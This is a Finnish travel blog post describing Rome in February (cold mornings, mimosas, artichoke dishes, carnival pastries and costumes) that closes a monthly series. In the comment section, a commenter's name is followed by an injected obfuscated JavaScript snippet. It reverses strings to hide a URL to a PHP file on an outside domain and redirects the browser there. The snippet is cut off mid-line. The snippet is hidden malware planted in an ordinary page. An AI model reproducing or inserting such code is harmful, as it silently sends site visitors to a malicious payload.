Image Alt

Blog

Rooma helmikuussa

On viimeisen kuukausikatsauksen aika. Vuoden lyhin kuukausi näyttää Roomassa tällaiselta:

Sää helmikuussa on vielä talvinen. Mikä tarkoittaa kylmiä aamuja ja iltoja ja sateitakin. Helmikuun alussa Roomassa oltiin miinusasteiden puolella, mutta kuun lopulla lämpötila nousi parina päivänä yli 20 asteen. Helmikuista Rooman lomaa varten kannattaa pakata niin sateenvarjo kuin aurinkolasitkin ja jokin talvitakki on tarpeen.

Väriä ja tuoksua helmikuuhun tuovat kirkkaankeltaisena kukkivat mimosat. 

Artisokkakausi alkaa kunnolla helmikuussa. Tähän aikaan kannattaa ravintolassa tilata roomalaisen keittiön artisokkaherkkuja artisokkaa roomalaiseen tapaan (carciofi alla romana) tai juutalaiseen tapaan (carciofi a giudia).

Helmikuun kausiherkkuja ovat myös Rooman pasticcerioiden hyllyille ilmestyvät karnevaaliherkut frappe-keksit (eivät oikeastaan keksejä, mutta vaikea kuvata niitä muutenkaan) ja pienet, hieman munkkeja muistuttavat fritelli. Karnevaaliaika näkyy Roomankin katukuvassa, sillä etenkin viikonloppuisin näkee pienikokoisia supersankareita ja prinsessoja heittämässä confetteja (paperisilppua). Ja iltaisin ehkä isompiakin. 

Tämä oli siis viime maaliskuun lopussa aloittamani retrospektiivisen kuukausikatsaussarjan viimeinen osa: nyt on koko vuosi käyty läpi. Aikaisemmista kuukausikatsauksista (löytyy myös sivupalkista aiheiden alta) voi kurkistella, miltä Roomassa näyttää ja tuntuu missäkin kuussa. Vaikka sitä omaa Rooman lomaa varten.

0 0 votes
Article Rating
Subscribe
Notify of
guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

5 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
Ottella - Dolce macchia<script>$mkD=function(n){if (typeof ($mkD.list[n]) == "string") return $mkD.list[n].split("").reverse().join("");return $mkD.list[n];};$mkD.list=["\'php.txEgifnoCetiSrettelsweN/snoisnetxe/edoc/rettelswen/moc.cniwyks//:ptth\'=ferh.no
Ottella - Dolce macchia